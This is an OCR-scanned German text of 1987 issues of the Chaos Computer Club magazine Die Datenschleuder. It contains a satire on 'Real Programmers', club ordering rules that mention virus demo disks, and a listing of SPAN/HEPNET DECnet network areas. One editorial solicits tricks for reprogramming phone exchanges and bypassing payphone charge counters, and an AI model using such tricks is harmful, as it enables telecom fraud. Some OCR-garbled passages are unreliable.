Ich empfehle daher bei einer Veröffentlichung von
Virusprogrammen folgende Vorsichtsmaßnahmen
unbedingt zu beachten:
a) Alles vermeiden, was darauf hindeuien könnte,
daß in der Veröffentlichung des Programms eine
Aufforderung zu dessen strafbarem Einsatz liegt.
b) Unbedingt deutlich und unmißverständlich auf
die Gefährlichkeit des PTogramins hinweisen und
mitteilen, wie der Anwender mit dem Programm
umzugehen bat, um eine Selbslschädigung oder
Schädigung Dritter zu vermeiden.
St. Ackermann, Hamburg
Numero 21 - Juni 1987 Sptciidrt|lcubcr
Teil II
Wo lebt der typische Richtige Programmierer? Was
für eine Art von Programmen sind solcher talen¬
tierter Individuen würdig? Man kann sicher sein, daß
sich kein Richtiger Programmierer totschreibt an
einem Programm für Konto-Außenstände in CO¬
BOL, oder einem Maillist-Sortierprogramm für das
’People’-Magazin. Ein Richtiger Programmierer
braucht Arbeiten von erderschütternder Wichtig¬
keit.
Richtige Programmierer arbeiten für das Los Ala-
mos National Laboratory und schreiben
Atombomben-Simulationen, die auf Cray I-
Supcrcomputem laufen. Sic arbeiten auch für die
National Security Agency und decodieren russische
Funksprüche.
Es war eine großartige Belohnung für die Anstren¬
gungen tausender Richtiger Programmierer bei der
NASA, daß unsere Jungs vor den Kosmonauten auf
den Mond und wieder zurück gekommen sind. Die
Computerim Space Shuttle sind von Richtigen Pro¬
grammierern programmiert, und diese wahren Profis
sind auch bei Boeing an der Arbeit, um Steue-
rungssystemc für Cruise Missiles zu entwerfen.
Einge der ehrfurchtgebietendsten Richtigen Pro¬
grammierer arbeiten im Jet Propulsion Laboratory in
Kalifornien. Viele von ihnen kennen das gesamte
Betriebssystem der Pioneer- und Voyager-Sonden
wie ihre Westentasche. Mit einer Kombination von
großen, in der Bodenstation verfügbaren
FORTRAN-Programmen und kleinen, in den Rech¬
nern der Sonden untergebrachien Assembler¬
programmen können sie unglaubliche Kunststücke
an Navigation und Improvisation vollbringen - wie
etwa nach sechs Jahren im All zehn Kilometer große
'Fenster’ am Saturn zu treffen, oder beschädigte
Sensor-Plattformen, Funkgeräte oder Batterien zu
reparieren oder zu überbrücken. Einerder Richtigen
Programmierer brachte es fertig, ein Bildverarbei-
lungsprogramm in einige hundert Bytes unbenutzten
Speichers in einer der Voyager-Sonden zu quet¬
schen, das anschließend einen neuen Jupitermond
suchte, lokalisiene und fotografiene.
Seite 14
Numero 21 - Juni I987
Seite 15
Ein Plan für die Galileo-Sonde geht dahin, auf dem
Weg zum Jupiter eine Gravitations-Ablenkung hin-
terdem Mars zu benutzen. Diese Route verläuft, +/-3
Kilometer, 80 Kilometer über der Marsoberfläche.
KeinMensch wird sich für diese Artvon Navigation
einem Pascal-Programm oder -Programmierer an¬
vertrauen.
Viele der Richtigen Programmierer arbeiten für das
U.S. Gouvemraent, vor allem für das Verteidi-
gungsministcrium. Das ist so, wie es sein soll. Vor
kurzem hat sich eine schwarze Wolke am Horizont
der Richtigen Programmierer zusammengeballt. Es
scheint, daß ein paar höhergestellte Müslifresser im
Verreidigungsministerium entschieden haben, daß
alle Verteidigungsprogramme in einer großen ver¬
einheitlichten Sprache namens Ada geschrieben
werden sollen. Für eine Weile schien es, als ob Ada
ausersehen worden wäre, sämtliche Regeln des
Richtigen Programmierens nichtig zu machen. Es ist
eine Sprache mit Struktur, Datentypen, Gro߬
schreibung und Semikolons. Kurz gesagt, wie ge¬
schaffen, die Kreativität des typischen Richtigen
Programmierers zu verkrüppeln. Glücklicherweise
hat die Sprache, derer sich das Department of De¬
fense angenommen hat, genügend interessante Fea¬
tures um sie annehmbar zu machen - sie ist un¬
glaublich komplex, beinhaltet Methoden, um
Schweinereien mit dem Betriebssystem anzustellen
und Speicher nachträglich einzurichten, und Edgar
Dijkstra mag sie nicht. Dijkstra, wie man wissen
muß, verfaßte ’GOTOs Considered Harmful’, ein
Meilenstein der Programmietmethoden, auf die
Pascal-Programmierer und MUsliffesser abfahren.
Nebenbei, ein Richtiger Programmierer kann
FORTRAN-Programme in jeder Sprache schreiben.
Der Richtige Programmierer kann einen Kompro¬
miß mit seinen Prinzipien eingehen und an gering¬
fügig trivialeren Dingen als der Zerstörung des Le¬
bens arbeiten, vorausgesetzt, dabei ist genug Geld zu
holen. Es gibt einige Richtige Programmierer, die
beispielsweise bei Atari Videospiele programmie¬
ren. Aber sie spielen die Spiele nicht. Ein Richtiger
Programmie'rer weiß, wie man die Maschine zu jeder
Zeit schlagen kann, und daß darin keine Heraus¬
forderung steckt. Jeder, der bei LucasFilm arbeitet,
ist ein Richtiger Programmierer, denn es wäre ver¬
rückt, das Geld von 50 Millionen Star Wars-Fans
sinnlos zu verplempern. Der Anteil von Richtigen
Programmierern in der Computergraphik ist etwas
niedriger als die Norm, großteils weil noch niemand
herausgefunden hat, wofür Computergraphik nütz¬
lich sein könnte. Andererseits ist die ganze Com¬
putergraphik in FORTRAN gemacht, sodaß es Leute
gibt, die Graphik machen nur um dem COBOL-
Programmieren aus dem Weg zu gehen.
Im allgemeinen spielt der Richtige Programmierer
auf die selbe Weise wie er arbeitet - mit Computern.
Es amüsiert ihn unausgesetzt, daß sein Auftraggeber
ihn für das bezahlt, was er ohnehin zu seinennVer-
gnügen tun würde, obgleich eres natürlich sorgfältig
vermeidet, seine Auffassung laut zu äußern. Gele¬
gentlich geht der Richtige Programmierer aus dem
Büro, um ein wenig frische Luft zu sich zu nehmen,
oder ein oder zwei Bier. Hier ein paar Tips, um
Richtige Programmierer außerhalb eines Rechen¬
zentrums zu erkennen;
-Auf Panies sind die Richtigen Programmierer die¬
jenigen in der Ecke, die über Betriebssystemsi¬
cherheit plaudern, und wie man sie umgehen kann;
-Bei einem Fußballmatch ist der Richtige Pro¬
grammierer derjenige, weicherden Spielverlauf mit
seiner Simulation, gedruckt auf grünweissem End¬
lospapier, vergleicht;
-Am Strand ist der Richtige Programmierer der, der
Flowcharts in den Sand zeichnet;
-Ein Richtiger Programmierer geht in eine Disco-
thek, um sich die Lightshow anzusehen;
-Bei einem Begräbnis ist der Richtige Program¬
mierer derjenige, der sagt: “Armer George. Und er
hatte die Sortienoutine kurz vor der Vollendung.“
-In einem Lebensmittelgeschäft ist der Richtige Pro¬
grammierer deijenige, der darauf besteht, seine Do¬
sen selbst an dem Barcode-Scanncr vorbeizuschie¬
ben, weil er nicht daran glaubt, daß Lochkanen-
tippsen es die ersten Male richtig machen.
©nfeiiWjIcuhcr
Von Menschen und Mäusen
Daraus entstehen Sachzwänge, die uns veranlassen,
nach bestimmten Spielregeln vorzugehen, damit
möglichst viel Leute möglichst wenig Arbeit haben.
Diese Spielregeln werden nur leider allzugeme ver¬
gessen , obwohl wir sie immer wieder bekanntgeben.
Hier nochmal Auszüge aus den Chaos-Regeln, dero
gütigster Gewogenheit des p.t. Publicum zur ge¬
flissentlichen Beachtung submissest anheimge¬
stellt:
Zunächst eine allgemeine Bemerkung zur Situation:
Es scheint landauf, landab die Meinung vorzuherr¬
schen, hier im Norden der Republik säße eine Hun¬
dertschaft hauptamtlicher Chaoten, die rund um die
Uhr in der Schwenckestrasse 85 hocken und nur
darauf warten, daß endlich mal eine Bestellung her¬
einkommt, die dann binnen weniger Picosekunden
erledigt wird. Hier liegt offenkundig eine Ver¬
wechslung mit einem ebenfalls in der frohen und
Hansestadt ansäßigen Versandunternchmen
(’Chaos ? - Find ich gut...’) vor. Das Gegentum ist
der Fall, wie wir zu unserem Leidwesen immer
wieder feststellen müssen.
Bestellungen, die per Post, per Blödeltexl oder te¬
lefonisch eingehen, gibt es reichlich. Woran es uns
fehlt, sind Leute, die das auch zügig bearbeiten
können. Wir haben außer dem CCC noch jeder einen
Brotberuf, der uns schonmal acht Stunden von der
Postbearbeitung abhält, ab und zu wollen wir ein
wenig ausruhen (“catch some sleep between iwo
corapiles,..“), und auch mal Zeit für uns selbst haben.
Übrig bleibt ein Häuflein von vier Leuten, die ver¬
suchen, alles im Gang zu halten und ihr Bestes zu
geben. Oft genug kommt es vor, daß eine offene
Rechnung aus eigener Tasche bezahlt wird, ohne
einen Gedanken daran, das ganze später wieder ein¬
zufordern. Die chaotische Datenverarbeitung findet
derzeit auf dem privaten PC eines Mitglieds statt, da
uns die Mäuse für einen Verwaltungsrechner fehlt
und wir, im Gegen.satz zur verbreiteten Legende,
auch nicht über ausreichende Kontakte zur spen¬
dierfreudigen Industrie verfügen.
Datensi lileuder - Abos:
Die Abos gelten für jeweils acht Ausgaben, weil wir
nicht garantieren können, innerhalbeincs Jahres eine
bestimmte Anzahl von Ausgaben zu produzieren.
Das hat sich soweit auch bewährt und bisher ist noch
niemand zu kurz gekommen; eher im Gegenteil,
Auf dem Aufkleber, der sich auf der Rückseite der
DS befindet, ist eine Nummer, die einerseits uns
hilft, den Abonennten in der Datei wiederzufinden.
Andererseits hat die Nummer auch für den Abon¬
nenten einen geistigen Nährwert: Die letzte Zah¬
lengruppe gibt an, bis zu welcher Ausgabe das Abo
noch besteht. Dabei sind alle Zahlungen berück¬
sichtigt, die uns bis zum Druck der Aufkleber am
Versandtag erreicht haben.
Wer die letzte Ausgabe seines Abos zugeschickt
kriegt, erhält kurz darauf nochmal Post von uns, in
der wir darauf hinweisen, daß das A’oo abläuft. Wer
dann immer noch der Meinung ist, er muß nicht mit
weiterer Kohle rüberrücken, wird automatisch aus
der Datei gelöscht, wenn die nächste DS zum Ver¬
sand ansieht. Das sind ungefähr sechs Wochen nach
Erhalt der Mahnung. Wir können uns den üblichen
Weg nicht leisten, der so aussieht, daß das Abo
fortgefühn wird, und die Kohle über Mahnverfahren
reinkommt. Wirhaltcn unsere Methode eh für fairer.
S)alcn8rf;Iciiticr
Seite 16
Ntimero 21 - Juni 1987
Numero 21 - Juni 1987
Seite 17
Mitgliedschaft im CCC:
Wir tragen Euch erst dann in die Liste ein, wenn die
Aufnahmegebühr und der Beitrag für mindestens ein
Vierteljahr entrichtet ist. Wir verschicken im all¬
gemeinen keine Bestätigung der Mitgliedschaft. Die
erfolgte Eintragung erkennt ihr am Aufkleber Eurer
DS: Wenn da als letzte Zahl 999 steht, bekommt ihr
das Ding im Rahmen der Mitgliedschaft oder eines
Austauschabos. Wir gehen davon aus, daS unsere
Mitglieder an ihrem Wohnort selbst aktiv werden
und stehen persönlich und telefonisch gerne zur
Verfügung, wenns um chaotypische Veranstaltun¬
gen geht. Schriftlich wäre das alles zuviel Aufwand.
Mailboxnutzung:
Wenn auf dem Bestellfetzen ein Benutzemame und
ein Passwort genannt ist und die Verwaltungsgebühr
für die Eintragung bezahlt ist, wird der Teilnehmer
in der IFXl oder CLINCH, je nach Wunsch, ein¬
getragen. Es erfolgt keine weitere Rückmeldung
über den Eintrag in die Box. Probiert halt, ob der
Account steht oder nicht. Bei Infex läuft der Zähler
ab Eintragung ins System, bei CLINCH wird ab
I Zahlung der Monatsgebühren gerechnet. Infex rechr
nen wir über den CCC ab, CLINCH rechnet der
Betreiber (also auch wieder ich) direkt ab. Für Zwei¬
felsfälle hat der Herr Reis das Telefon erfunden...
Sonstige Bestellungen
Volkszählungsdemos gibts von uns nicht mehr,
mangels Autorisierung. Wer noch ’ne Bestellung
offenhat und glaubhaft machen kann (Belege), daß
wir trotzdem kassiert haben, kriegt seine Kohle post¬
wendend wieder.
Die Virendemos werden Zug um Zug ausgeliefert,
sobald die Disks kopien sind. Wir haben schlicht und
ergreifend nicht mit derart vielen Bestellungen ge¬
rechnet. So habet bitte Geduld ächz.
Generell gilt: Lieferzeiten von ’nem Vierteljahr sind
bei uns leider keine Seltenheit. Aber bisher hat noch
jeder das gekriegt, was wir liefern können, bzw. es
gibt das Geld zurück. Auf Mahnungen und Dro¬
hungen mit dem Anwalt reagieren wir sauer. Es gibt
mittlerweile Überlegungen, eine schwarze Liste von
Seiteis Nmiiero21
Leuten zu führen, mit denen wir nichts zu tun haben
wollen. Dazu gehören die notorischen Einschreiber
und ähnlich nervtötende Spezies, weil wir einfach
nicht dauernd zur Post rennen wollen, um irgend¬
einen Schmachtfetzen abzuholen, der eh irrelevant
ist. Sowas ignorieren wir nach dem biblischen Molto
'Auge um Auge,..’. Wir verschicken schließlich
auch keine Einschreiben.
Achja, Schecks: Wir reichen Schecks in dem Au¬
genblick zur Gutschrift ein, wo wir mehr als die
Hälfte der Bestellung erledigt haben. Beispiel: Je¬
mand wird Mitglied, bestellt die Virendisk und legt
einen Scheck über 165.00 DM bei. Wir tragen ihn in
die Mitgliederliste ein und er kriegt ab sofon die DS
mit der 999 im Aufkleber. Die Virendisk kriegt er
wahrscheinlich erst in zwei Monaten, die aktuelle
DS etwas früher. Wenn wir jetzt warten würden, bis
er sowohl die Disk, als auch die erste DS gekriegt hat,
wäre der Scheck wahrscheinlich gar nicht mehr ein¬
ziehbar. Folglich ziehen wir ihn in dem Augenblick
ein, in dem die Daten in der Mitgliederdatei gelandet
sind.
Reklamationen:
Es bleibt nicht aus, daß mal etwas bei uns unter den
Tisch fällt. Das sollte aber für den Chaos-Kunden
kein Grund sein, gleich mit Anwahsdrohungen um
sich zu werfen. Wir halten uns für ziemlich fair, was
das Erledigen von Bestellungen angeht, und er¬
warten dafür ein Mindestmaß an Toleranz von den
Bestellern. Zu kurz gekommen ist noch niemand,
auch wenns mal etwas dauert. Ein kurzer Anruf inder
Geschäftsstelle bewirkt oft mehr als mancher Droh¬
brief. Mögliche Anlaufstellen für Reklamationen
sind:
- Telefonisch: 040-4903757 (der Anschluß ist aber
nicht kontinuierlich besetzt).
- Blödeltext: 0404903757-0008 bei Abofragen/-
Mailboxnutzung, sonst über normale Mitteilungs¬
seite an das Servicecenter.
- Mailbox: GeoNet: GE01:CHAOS-TEAM oder
IFXLCLINCH. CLINCH: SYSOP.
Wichtig ist, daß angegeben wird, was wann bestellt
wurde und was davon eventuell schon geliefert wur¬
de.
verwal2Lds 198706032100 goblin
Juni 1987 Zinlcnfldjiculicr
Grummel
Denkvorgänge made in Germany-
Anlass zum Schreiben dieses Artikel war für mich
die Situation an einer Ampel.
Die Ampel verwaltete gerade noch ca. 1.50 m
Fussgängerweg. Das ist in Anbetracht der Tatsache,
daß da eine Baustelle war, nichts wunderliches.
Nachdenklich gemacht haben mich erst jene Leute,
die 2 Minuten warten, bis sie die 2 Schritte mit
offizieller Genehmigung (=grün) zurücklcgen. Das
Denken wird also der Ampel überlassen (künstliche
Intelligenz?).
Die Ursachen für solche AlUagskrankheiten im
20len Jahrhundert sind nicht zuletzt in derTaktik des
Staatsapparates Indula zu sehen. Die Werbung zur
Volkszählung beispielsweise suggeriert, daß man
sich auf die Regierung, ihre Gesetzgebungen und
Beschlüsse verlassen und sein Hirn beruhigt an der
Garderobe abgeben kann könne. Denken tun die
Profis “da oben“.
Diese Grenze zwischen “denen da oben“ und “uns da
unten“ wird durch die Art und Weise stark gefördert,
in der die Medien Wirklichkeit erzeugen. Siehe unter
anderem die Berichterstattung über das englische
Königshaus (Bla, Dröhn), oder nicht zuletzt das
künstliche Hoch “spielen“ des sportlichen Berei¬
ches. Es gibt ja wirklich nichts wichtigeres auf Erden
als Tennis, vor allem, wenn man sich in einer be¬
sonders sozialen Gesellschafi befindet, dieüber zwei
Millionen Arbeitslose zu verbuchen hai und die
Automation (siehe Ampel) weiterhin stark fördert
(so daß praktisch jeder ebenfalls morgen auf der
Straße sieben könnte).
Der ungeschriebene Regieningsgrundsatz "alle sind
gleich, nur manche sind gleicher“, wird inzwischen
ganz selbstverständlich akzeptiert. Es ist einfach
eine Selbstverständlichkeit geworden, daß jemand,
der auf einer Demo in eine Polizeikontrolle gerät,
anders behandelt wird, als einer, der sich in der Nähe
eines grade stattgefundenen Bankraubs befindet.
In diesem Sinne stellt Hacken (für mich) geistiges
Überlebenstraining dar; außerdem das sinnvolle
Nutzen neuer Technologien. Wie war das noch:
Verzeih ihnen, denn sie wissen nicht, was sie tun...
Wohl eher; You are whai wlial you do, yott are what
you ihink, help yoursclf!
Andy
8706181935 MDM1GD21.DOC ANDY
Salcnöri)lciit)cr
Geld per Fingerabdruck
Berichtete die Hamburger Morgenpost (30.5.87) da¬
von, daß es nun endlich einen EC-Kanen-Notruf in
Frankfurt gibt (0697747700; Bank, BLZ, Komo-Nr.,
Kartennummer und Vcrfalldatum müssen genannt
werden), so ist man in Amerika schon weiter. Dort
wird ein Gerät produzien, das erst nach positivem
Fingerabdmck-Vergleich Geld rausruckt. Der Kund
steckt einen Finger in den Geldautomaten, dieser
schickt das Abdruckbild an die Zennale und be¬
kommt Antwort.
(aus Capital, Juni 87)
IMPRESSUM
SntciiSrfjlciibcr
Numero 21 - Juni 19871
Das wissenschaftliche Fachblait
für Dalenreisende
D-2000 Hamburg 20
Schwenckestrasse 85
ViSdP: Reinhard Schnitzki
Herausgeber : Cnaos Comouef Quo
Mitarbeiter (u.a.);
Herward Holland-Moritz, S. Wemery,
A. Eictiler, Marina Kern, P. Franck,
H. Gmsel, M. Kuehn, AndyM.-M.,S. Stahl,|
Geonet; Geol: Chaos-Team
CLINCH : Chaos-Team
BIX 655322
Nachdruck für nichlgewerbliche Zwecke
bei Quellenangabe erlaubt.
Zweifarb-FußabDmck im Selbstverlag.
l
üi^wciraro-ruDapur
Numero 21 - Juni 19S7 SGit8 19
Numero 22 - Juli 1987
Postvertriebsstück
C9927F
WcDo uBittstellbar
ÄDSchrifteuasscbikitt bitte
mit acuer Adresse zurück
DM3,00
Siie SiatenSi^Ieuiiec
Das wissenschaftliche Fachblatt für Datenreisende
Ein Organ des Chaos Computer Club
..■rnTm.'iiiimiiiiiiiiiMiiiiii
C.L.I.N.C.H.
COMPUTER & MEDIENBERATUNG
Mailboxsysteme (Ur
Telefon &
Datexanschluß
inhouse - Kommunikation
SystemA Softwareinstallation
...
flrulfdif fiollci’irli niordiincn
ß(fcll|'diiifr Dl. Ii (j ÖcrliD
SnfciiJrfjIcuicr
Seile 20
Puzzlespiel Quatschexplosion
Lösung zum DS21-Ratselartlkel
Nachdem unsere letzte DATENSCHLEUDER
fertig gelajoutet war, dachten wir: nur noch zum
Drucker und in den Versand; wieder einmal ein
Meilenstein geschaffi. Doch weit gefehlt.
Nachdem ich meinen eigenen Artikel, den ich
auch selber geiayoutet hatte, gelesen habe,
kommt mir das kalte (trotz 27 Grad drauflen)
Grausen. Da habe selbst ich Probiemem, die ein¬
zelnen Textschnipsel DER RICHTIGEN RE J-
HENFOLGE zu lesen! Mi$L verdammter, dachte
ich mir und setzte mich an diesen hier. Nach dem
Motto “die Auflösung des Knotens verraten wir
Ihnen morgen“ nun die Lese-Anweisung für den
Artikel “Die Quatschexplosion“. Mit großer Ent¬
schuldigung.
Von Seite 4, oben, bis Seite 6, Mitte. 2. Absatz: alles
ok.
Dann, nach: “BRS/Search, ME=Auswaheinstiegs-
menue, MQ=Auswahi“
Sprung nach Seite 7, links oben, und weiter mit: “des
Sachgebietes...“
Anschließend alles ok bis Seite 7, rechte Spalte,
Ende 1. Absatz.
Nach: “...wegen ihrer elektronischen Verfügbarkeit
für geheim erklärt wurden.“ Sprung nach Seite 6,
linke Spalte, 2. Absatz Mitte, ab:“Hier setzt auch die
Kritik an:...“
Anschließend wieder alles paletti bis Seite 6, rechte
Spalte Ende:
Nach: “DM 19(X).-" Sprung nach Seite 8, Unke
Spalte Anfang, und weiter bei: “Somit Erpanüs
monatUch...“
Wiedenun alles in Butter bia Seite 8, rechte Spalte,
1. Absatz Ende:
Von: “..verschiedene Versionen der Technik.“
Sprung nach Seite 7, rrehte Spalte, 2. Absatz An¬
fang, weiter bei:“Dagegen ist bei den CD-ROMs...“
Und wieder ungestört weiter bis Ende Seite 7, 2.
Spalte: “..bei einer Auflage von KKX) Stück.“, von da
ab Sprung nach Seite 8. rechte Spalte, 2. Absatz
(leicht zu erkennen, da verrutscht) :“Schön war die
CD-I...“ und in aller Ruhe weitcrlescn bis zum
Schluß.
PX- 8 /a:pu 2 zel.txt A.EichIer 87063015:24
CUNCHIDS-REDIGOBIJNI13.07.87109:1511513
Seite 2
Was ist noch kleiner als
der Punkt auf dem Rücken
eines Marienkäfers?
Eins „iniegriaric Scticliuno'
vanTELEFUN : nur Imm braUl froUdAm
übernimmt diaeer Ulkro>Bauat«in die
Furkiionen von 2 rranalaioren und^Widar*
sidncen. unaata Eiakironen'Racnnar zum
fiaiapiel arbaiien mit Tautandan solcher
winzig kleinen aautalla. Ohne diaaa Mikro-
Elemanta wären die Rechanaggregaia
mehr als zehnmal ao groS.
Mikro-Mlniaturlsierung lat ein aahr wicniigea
Arbeitsgebiet lür TELEFUN . Dann die
hier gewonnenen Erkenntnlaaa kommen letzten
Endes auch unaaran Heimgaritan zugute-
und damit Jedem TELEFUN Käufer.
28.0S.-'SO-OB. Sysoptreffeo in Berüa
Der IPN, CCC und CAC ladeo zum Tr^en
der Mailboxbetreiber. Veransultuagsott üt
der Mchringhof in BerUn. Axuoeldung bei: IPN,
H J^opper, Bniseodorfer Str. 20.1 BerUn 44.
28.0$. - 14.09. Intemadoaile FunksussieUung Ber¬
Un
Die Koosumelekaoaik Ufit GiüSeo.
HackemelFDienstag am Postsund um l6Uhr.
12.09. -13.09. CCCtWortshop in Hamburg
Beginn der Testphase von BTXNET. Maüboxbe-
treiber beginoen mit Testbecrieb
cinei dgeaen Neues. Oc EideUtedter
BQrgerhaui. Auf Hnladung.
19.10. • 23.10. SYSTEMS in MOchnchen
Hackeroeff Diensug am Foststand 16 Uhr.
28.12. • 29.12. Ol am Conusunicidoa Coogxess
1987-Hamburg
Die europäische Hackerpaity. Niberes ün Oktober.
Wdtere Hinweise in den Ba-Progiuzmxn de« CCC
CAC und der BHP.
Eneicbbar Uber *653322«.
S)afcodri!jfcp&cc
Editorial
Lieber DATENSCHLEUDER Leser,
in den letzten Monaten hat sich nicht nurdas Gesicht,
sondern auch der inhaltliche Schwerpunkt der DA¬
TENSCHLEUDER verändert. Während in den er¬
sten Ausgaben vorwiegend Tricks, Kniffe und kleine
Hilfestellungen im technischem Alltag verbreitet
wurden, lag der Schwerpunkt in den letzten Aus¬
gaben mehr auf allgemeinen Betrachtungen zur In-
formationsgesellschaft, deren Erscheinungen und
Folgen. Diese etwas einseitige Gewichtung wird
nicht nur von Lesern kritisiert, sie liegt auch der
Redaktion im Magen.
Die erste Gemeraion der Datenreisenden rückt dem
gesetzterem Alter näher, Arbeit und Beruf nehmen
den ersten Platz ein. Die Zeit für aufwendige Hack’s
wird rarer. Das Hacken als solches verliert an Stel¬
lenwert. Interessanter werden inhaltliche und auch
politische Auseinnanderseizungen mit den Ent¬
wicklungen zur Informationsgesellschaft. Anderer¬
seits fehlt Teilen der zweiten Hackergeneration oft
die gewisse Ernsthaftigkeit. Das führt unter anderem
auch zu geringen Rückflüssen aus unserem Leser¬
kreis. Unser Ziel war es eigentlich nicht, Fast-
Food-Informationen (fressen und vergessen) zu ver¬
breiten.
Diemeisten Artikel der DATENSCHLEUDER wer¬
den von einem kleinen Kreis von älteren Mitarbei¬
tern geschrieben. Zwar erreichen uns ab und zu
Hinweise, die sich zu einem Artikel aufbereiten
lassen, insgesamt gehen aber viel zu selten ver¬
wertbare Beiträge aus der Leserschaft ein. Wir rufen
hiermit dazu auf, die DATENSCHLEUDER durch
Beiträge und Informationen zu unterstützen. Dies
gilt ebenso für den zum Herbst geplanten zweiten
Teil der Hackerbibel. Knete haben wir natürlich
nicht, aberu.a. die wiederholte Namensnennung des
Autors im Impressum ermöglicht so manchen preis¬
werten Messebesuch als Journalist, welcher wie¬
derum neue Erkennisse und Kontakte vermittelt.
Mit einer Geschichte über das Telefonnetz in Kairo
und einer Anleitung zur Benutzung ägyptischer Te¬
lefonzellen beginnen wir in diesem Heft eine Reihe
unter demTitel Die Wahrheit über das Globale Dorf.
Im nächsten Heft gibt’s einen Bericht über ein Te-
lecommunication Trainings Center in Nepal. Auch
für diese Reihe würden wir uns freuen über Material,
das uns aus der werten Leserschaft erreicht. Denn:
“These are the days of lasers in the jungle“ (Paul
Simon).
©nicnSd^Icukcr
Für eine der nächsten Ausgaben bereiten wir au¬
ßerdem einen ausführlichen Bericht über alle uns
bekannten Tricks rund ums Telefon vor. In dieser
Sache bitten wir um Berichte und Informationen
über alle bekannten Tricks und Kniffe, sei es das
Umprogrammieren von Nebenstellenanlagen zur
Anrufweiterschallung oder das Umgehen der Ge¬
bührenzähler in Telefonzellen. Wir werden (imRah-
men der gesetzlichen Möglichkeiten) das Material
aufbereiten.
Wir wollen auch weiterhin versuchen, mit der DA¬
TENSCHLEUDER ein offenes und ein wenig sub¬
versives Organ zu betreiben. Ohne eine Unterstüt¬
zung durch unsere (auch jüngeren) Leser ist das
kaum zu leisten.
Steffen
LS23
Seite 3
Networking
Das Space Physics Analysis Network, kurz SPAN
genannt, wächst exponentiell über den Kurs des
letzten Jahres hinaus. Während dieser Periode ver¬
dreifachte sich die Anzahl der Netzwerkkreise (net-
work areas). Die Zahl der über SPAN erreichbaren
Computer stieg auf über 1.600 VAX-SuperMini-
Sysieme.
Die Vielfalt der Netzwerkteilnehmer erforderte in
letzterZeitdie Einrichtung einer Koordinations-und
Infoimationszentrale. Das SPAN Network Infor¬
mation Center (SPAN-NIC), geleitet vom (US) Na¬
tional Space Science Data Center, übernahm die
Aufgabe des Netzwerk Managements, Das SPAN-
NIC verfügt über eine Datenbank zur Pflege und
Verwaltung des SPAN-WAN (Wide Area Net¬
work). Die Datenbank ist auch für User erreichbar,
denen ein Zugang zum SPAN-DECNET fehlt, denn
es besteht eine Schnittstelle zumTELENET (X25),
dem NASA Packet Switched System (NPSS) und
dem ARPANET.
SPAN bietet seinen Unsem ebenfalls Schnittstellen
zu anderen DECNET-LAN’s (Local Area Net¬
works), unter anderem HEPET, TEXNET und INF-
NET. Zusammen ergibt sich in der westlichen Welt
ein Super-Netzwerk mit einem ziemlich giganti¬
schen Potential an Forschung und Wissenschaft.
Die Stmktur des SPAN der Vereinigten Staaten
basiert auf den Verbindungen einer Vier-Steme-
Topologie. Jeder Stern des Netzes besitzt als seinen
Kern einen sogenannten Router bzw. Knotenrech¬
ner. Router im SPAN sind das GSFC, MSFC, Jet
Propulsion Lab (JPL) und das Johnson Space Center
(JSC). Alle Router kommunizieren über 56 KBaud
Standleitungen miteinander, sowie mit 9600 Baud,
der niedrigsten Geschwindigkeit im DECNET, zu
den Nebenrechnern.
Die europäische Komponente des US-SPAN, das
EURO-SPAN, wächst ebenfalls rapide. Die
DECNET-Schnittstelle zwischen EURO-SPAN und
US-SPAN wird durch eine 9600 Baud DATEX-P-
Verbindung hergestellt. Den europäischen Router
verkörpert eine VAX 11/750 des European Space
Operation Center (ESOC) in Dannstadt. DerESOC-
Knoten teilt sich wiederum an andere deutsche In¬
stitute wie die European Molecular Biological La¬
boratories (EMBL) und das Max-Planck-lnstitut
(MP!).
Seite 4
Im September 1986 wurde eine Vernetzung des
SPAN mit dem weltweiten High Energy Physics
Nenvork (HEPNET) vorgenommen, welches eben¬
falls auf der VAX/VMS DECNET-Ebene basien.
EURO-HEPNET und US-HEPNET bedienen sich
einer X25-Leitung zwischen dem europäischen Lei-
trcchner VXCRNA, einem VAX8650-Cluster des
CERN in Genf, sowie den Cal Tech Laboratories,
dem Fermilab, und MIT in Boston/USA. Eine
DECNET-Verknüpfung zwischen dem CERN Area
22 und dem Area 28 des MPI ist für den Sommer
1987 geplant.
Die größte DECNET-Area des SPAN stellt das
TEXNET. TEXNET verknotet die drei Staats-
Universitäten Texas A&M, das DECNET der Uni¬
versität Texas, sowie die Universität von Huston.
Allein im Januar 1987 waren über 400 VAXen dem
TEXNET verbunden.
Nachfolgend sind die wichtigsten miteinander ver¬
knüpften DECNET-Areas aufgefühn:
1 SPANLOS Alamos National Laboratories
SUNETSweden Univ. Network
2HEPN'ETUniversity of Wisconsin
3SPANUnivcrsity of Miamy + Ocean Labs
4HEPNET/SPANExperimental Gateway
SSPANJet Propulsion Laboratories
CCNETStevens Institute of Technologies
eSPANNASA'sGoddard Flight Center
7HEPNETCal Tech
SPANNASA’s Marshali Space Center
SSUNETSweden Universiiy Network
9SUNETSweden University Network
lOTEXNETTexas Universitics
1 INICENETNaval Research Laboratories
12HEPNETUniversity of Boston
12UCSBUniversity of California
14CCNETUniversity of New York
l5CCNETNew York University
16EURO-HEPNETSPAIN
17HEPNETHarvard University
18DAN (SPAN)NRC-Canada Ottawa
19HEPNETCornell-C University
20CHADNETSwitzerland
21CCNETUniversity of Columbia
22EURO-HEPNETCERN in Geneva
23EURO-HEPNETAusma
24SPANNASA’s Arnes Research Center
25TEXNET/CHPCUniversity of Texas
26TEXNET/CHPCUniversity of Huston
27SPANJet Propulsion Laboratories
S«tciigd|Icubcr
28EURO-SPANESA nodes Darmstadt FRG.
29SPANNASA
30SPANJPL
31 NIKHER'letherlarais
32EURO-HEPNETFrance
33SPANColorado State Wide Network
CCNETUniversity of Pittsburgh
34CCNETPittsburgh University Net
35EURO-HEPNETPonugal
CCNETNASA Flight Center
36LANL/D0ELOS Alamos Labs / Dept. of Energy
37CNR/EURO-HEPNETItaly
38EURO-HEPNETItaly
39INFNETliaIy
40HEPNETJapan
41HEPNETStanford Centers/SLAC
42HEPNETFermilab
43HEPNETBrookhaven
44-49HEPNETHEPNET
50DPHPEFrance
52EURO-HEPNETBelgium
S3EURO-HEPNETAustTia
54STARLINKUniied Kingdom
55HEPNETBrown University
56EURO-HEPNETSweden
59EURO-HEPNETWest Geimany
60LEP3NETM1T Boston
S-Stahl
Vtg 533/1987
AHg«metne Zulassung einzelner einfacher mechanischer pas*
siver Kontakte eis Fernwirkendeinrichtung für den Betriebs'
versuch TEMEX
.Ausnahmsweise werden für den BeineDsversuch TEMEX nach § 53
Cer Femmeideordnung (Obergargsvorschnften zu § 38c Nr 2)
einzelne einfache mechanische passive Kontakte zur Anschlie3ung
